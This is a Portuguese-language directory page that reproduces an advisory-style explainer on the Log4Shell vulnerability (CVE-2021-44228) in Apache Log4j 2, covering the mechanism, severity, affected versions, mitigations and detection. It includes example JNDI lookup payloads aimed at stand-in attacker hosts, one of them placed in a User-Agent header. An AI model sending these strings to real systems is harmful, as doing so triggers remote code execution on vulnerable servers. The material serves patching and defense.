Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/0xblackash/cve-2021-44228
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebInteligência de AmeaçasAprendizado e EducaçãoRecursos Curados
GitHub0xblackash/cve-2021-44228

CVE-2021-44228

CVE-2021-44228

Ver Repositório
2há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 CVE-2021-44228 — “Log4Shell”

ChatGPT Image Jun 14, 2026, 02_56_45 PM

Severity CVSS Type Date

Uma vulnerabilidade crítica de execução remota de código no Apache Log4j 2, amplamente conhecida como Log4Shell.


📖 Índice

  • Visão Geral
  • Detalhes Técnicos
  • Gravidade & CVSS
  • Versões Afetadas
  • Exploração & Impacto
  • Impacto no Mundo Real
  • Detecção
  • Mitigação & Correções
  • Resumo

🔎 Visão Geral

CVE-2021-44228 é uma vulnerabilidade crítica de RCE no Apache Log4j 2 versão 2.x (antes de 2.15.0), descoberta em dezembro de 2021.

Ela permite que atacantes remotos não autenticados executem código arbitrário em sistemas vulneráveis simplesmente ao enviar uma entrada especialmente criada que é registrada pelo Log4j. A falha afeta inúmeros aplicativos e serviços baseados em Java globalmente.


🧠 Detalhes Técnicos

Baixar ferramenta

A vulnerabilidade surge do tratamento de lookups JNDI em strings registradas pelo Log4j. Um atacante pode incorporar um recurso JNDI malicioso em uma mensagem registrada (ex.: LDAP, DNS), como:

root@kitploit:~

${jndi:ldap://attacker.com/a}

O Log4j irá:

  1. Analisar o lookup JNDI da entrada
  2. Realizar um lookup remoto para o servidor controlado pelo atacante
  3. Carregar código Java malicioso como parte do processo de lookup
  4. Executar esse código no contexto do aplicativo vulnerável

Isso permite que um atacante alcance Execução Remota de Código (RCE) completa nos serviços afetados.


📊 Gravidade & CVSS

MétricaDetalhe
Pontuação Base CVSS v3.110.0 (Crítico)
Vetor de AtaqueRede
Privilégios NecessáriosNenhum
Interação do UsuárioNenhuma
AutenticaçãoNão necessária
ImpactoRCE total

Como o Log4j é usado em inúmeras bibliotecas e aplicativos, qualquer sistema que registre dados não confiáveis pode ser vulnerável.


📦 Versões Afetadas

As seguintes versões do Log4j 2 são vulneráveis:

root@kitploit:~

> = 2.0-beta9 e < 2.15.0

Além disso, algumas configurações do 2.15.0 ainda eram exploráveis, então 2.16.0 e posteriores são a base segura.


🛠 Remediação & Correções

✅ Versões Corrigidas Oficiais

Atualize para as versões do Log4j 2:

root@kitploit:~

2.17.1 ou posterior

Patches posteriores melhoram ainda mais a segurança (ex.: 2.17.2, 2.19.0, etc.).


🧱 Mitigações Temporárias (se não for possível aplicar o patch imediatamente)

Se a atualização imediata não for possível, você pode:

  • Desabilitar lookups JNDI na configuração do Log4j
  • Definir:
root@kitploit:~

log4j2.formatMsgNoLookups=true

  • Remover a classe JndiLookup do classpath:
root@kitploit:~

zip -q -d log4j-core.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

Essas etapas ajudam a reduzir a exposição até que você possa atualizar.


🔥 Exploração & Impacto

nessus3
nessus4
nessus5

Esta vulnerabilidade é extremamente fácil de explorar. Um atacante só precisa enviar uma string manipulado (ex.: via cabeçalhos HTTP, parâmetros de formulário, mensagens de chat, campos de banco de dados) que seja registrada pelo aplicativo:

root@kitploit:~

User-Agent: ${jndi:ldap://attacker.example/a}

Uma vez registrada, o aplicativo realizará um lookup remoto e poderá ser forçado a executar código Java controlado pelo atacante.


🌍 Impacto no Mundo Real

O Log4Shell teve um impacto global massivo:

  • Inúmeros serviços públicos foram imediatamente expostos
  • Provedores de nuvem, servidores de jogos, aplicativos empresariais, IoT, serviços web, APIs e muito mais foram afetados
  • Comunidades de segurança inteiras se mobilizaram para detectar e corrigir sistemas vulneráveis
  • A exploração foi generalizada, automatizada e rápida

Esta é uma das vulnerabilidades mais significativas em décadas.


🧪 Detecção

Você pode detectar sistemas vulneráveis:

  • Escaneando logs em busca de padrões JNDI suspeitos (${jndi:)
  • Usando scanners de vulnerabilidade que verificam versões do Log4j
  • Monitorando o tráfego de entrada em busca de tentativas de exploração
  • Verificando o conteúdo do classpath para suporte a lookup JNDI

📌 Resumo

CampoValor
ID CVECVE-2021-44228
ApelidoLog4Shell
ProdutoApache Log4j 2
GravidadeCrítico (CVSS 10.0)
TipoExecução Remota de Código
ImpactoComprometimento total do sistema
ExplorabilidadeExtremamente fácil
MitigaçãoAtualizar para ≥ 2.17.1

⚠️ Aviso Final

Se seu aplicativo ou qualquer biblioteca que você usa depende do Log4j 2.x, atualize imediatamente para uma versão corrigida (≥ 2.17.1) e verifique se os lookups JNDI estão desabilitados ou removidos onde possível.